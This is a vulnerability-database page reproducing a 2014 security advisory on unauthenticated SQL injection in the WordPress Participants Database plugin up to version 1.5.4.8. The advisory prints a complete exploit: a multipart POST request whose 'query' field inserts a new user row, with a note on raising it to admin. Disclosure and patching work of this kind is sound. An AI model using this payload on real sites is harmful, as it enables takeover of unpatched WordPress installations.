Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Participants Database 1.5.4.8 SQL Injection

🗓️ 02 Jun 2014 00:00:00Reported by Yarubo Research TeamType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Participants Database Wordpress 1.5.4.8 SQL Injection allows unauthenticated attackers to fully compromise installatio

Code
`Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress  
=========================================================================  
  
Program: Participants Database <= 1.5.4.8  
Severity: Unauthenticated attacker can fully compromise the Wordpress  
installation  
Permalink: http://www.yarubo.com/advisories/1  
  
— Info —  
  
Participants Database is a popular Wordpress plugin that offers the  
functionality needed to build and maintain a database of people. As of  
today the plugin has been downloaded 92,089 times.  
  
— Vulnerability details —  
  
1. Due to insufficient privilege checks it is possible for anonymous  
(unauthenticated) users to trigger some administrative actions If any of  
the shortcodes is used (e.g. signup page).  
  
2. The action "export CSV" takes a parameter called "query" that can  
contain an arbitrary SQL query. This means that an unauthenticated user can  
execute arbitrary SQL statements (e.g. create an admin user, read or write  
files, or execute code depending on the MySQL user privileges).  
  
  
— Exploit —  
  
Add a user to wordpress as follows (if you want an admin user, also add  
admin privileges to wp_usermeta):  
  
  
POST /wordpress/pdb-signup/ HTTP/1.1  
Host: www.example.com  
Content-Length: 789  
(…)  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryuoACADe1C2IFWMxN  
  
------WebKitFormBoundaryuoACADe1C2IFWMxN  
Content-Disposition: form-data; name="action"  
  
output CSV  
------WebKitFormBoundaryuoACADe1C2IFWMxN  
Content-Disposition: form-data; name="CSV_type"  
  
participant list  
------WebKitFormBoundaryuoACADe1C2IFWMxN  
Content-Disposition: form-data; name="subsource"  
  
participants-database  
------WebKitFormBoundaryuoACADe1C2IFWMxN  
Content-Disposition: form-data; name="query"  
  
INSERT INTO wp_users  
(ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)  
VALUES  
(31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);  
  
------WebKitFormBoundaryuoACADe1C2IFWMxN  
  
  
  
— Solution —  
  
This issue has been fixed in version 1.5.4.9. Download the newest version  
from:  
  
https://wordpress.org/plugins/participants-database/  
  
  
— Credit —  
  
  
Yarubo Research Team  
research [at] yarubo.com  
  
Network Security Scan:  
http://www.yarubo.com/  
  
Free Heartbleed Scan:  
http://www.yarubo.com/heartbleed  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Jun 2014 00:00Current
0.5Low risk
Vulners AI Score0.5
wordpressvulnerabilitysql injectionunauthenticatedcompromisesecurity fixyarubo
25